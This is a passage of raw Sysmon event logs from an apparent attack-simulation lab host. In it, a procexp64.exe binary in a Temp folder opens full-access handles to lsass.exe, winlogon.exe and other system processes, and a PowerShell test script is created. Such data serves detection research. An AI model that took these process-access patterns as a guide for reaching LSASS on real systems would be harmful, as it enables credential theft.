ws\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787435Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:10.705{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0900-00000000A301}796C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787434Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:10.705{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0900-00000000A301}796C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787433Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:10.705{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2900-00000000A301}2724C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787432Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:10.705{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2800-00000000A301}1980C:\Windows\System32\spoolsv.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787431Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:10.705{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1523-600B-2600-00000000A301}3012C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787430Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:10.705{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151F-600B-2400-00000000A301}2896C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787429Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:10.705{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151F-600B-2300-00000000A301}2888C:\Users\Public\splunkd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787428Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:10.705{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151B-600B-2100-00000000A301}2328C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787427Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:10.705{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1700-00000000A301}1636C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787426Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:10.705{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1600-00000000A301}1528C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787425Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:10.705{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1500-00000000A301}1480C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787424Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:10.705{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1400-00000000A301}1276C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787423Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:10.705{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1300-00000000A301}1200C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787422Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:10.705{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1200-00000000A301}1192C:\Windows\system32\dwm.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787421Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:10.705{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1100-00000000A301}1160C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787420Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:10.705{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1000-00000000A301}1152C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787419Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:10.705{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0F00-00000000A301}1120C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787418Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:10.705{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0E00-00000000A301}1076C:\Windows\system32\LogonUI.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787417Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:10.705{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0D00-00000000A301}624C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787416Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:10.705{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0C00-00000000A301}584C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787415Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:10.705{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787414Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:10.705{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0A00-00000000A301}848C:\Windows\system32\services.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787413Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:10.705{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0900-00000000A301}796C:\Windows\system32\winlogon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787412Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:10.705{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0800-00000000A301}720C:\Windows\system32\csrss.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787411Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:10.705{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0700-00000000A301}712C:\Windows\system32\wininit.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787410Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:10.705{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1517-600B-0500-00000000A301}640C:\Windows\system32\csrss.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787409Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:10.705{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1514-600B-0200-00000000A301}448C:\Windows\System32\smss.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787408Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:10.705{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1514-600B-0100-00000000A301}4System0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x8000000000000000787407Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:10.689{732C744F-323A-6010-C9A2-00000000A301}2788C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\2\__PSScriptPolicyTest_h3sdlrst.1mg.ps12021-01-26 15:16:10.689 10341000x8000000000000000787406Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:10.674{732C744F-151A-600B-0C00-00000000A301}5842624C:\Windows\system32\svchost.exe{732C744F-323A-6010-C9A2-00000000A301}2788C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787405Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:10.658{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-323A-6010-CAA2-00000000A301}2912C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787404Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:10.658{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-323A-6010-CAA2-00000000A301}2912C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787403Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:10.658{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-323A-6010-C9A2-00000000A301}2788C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787402Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 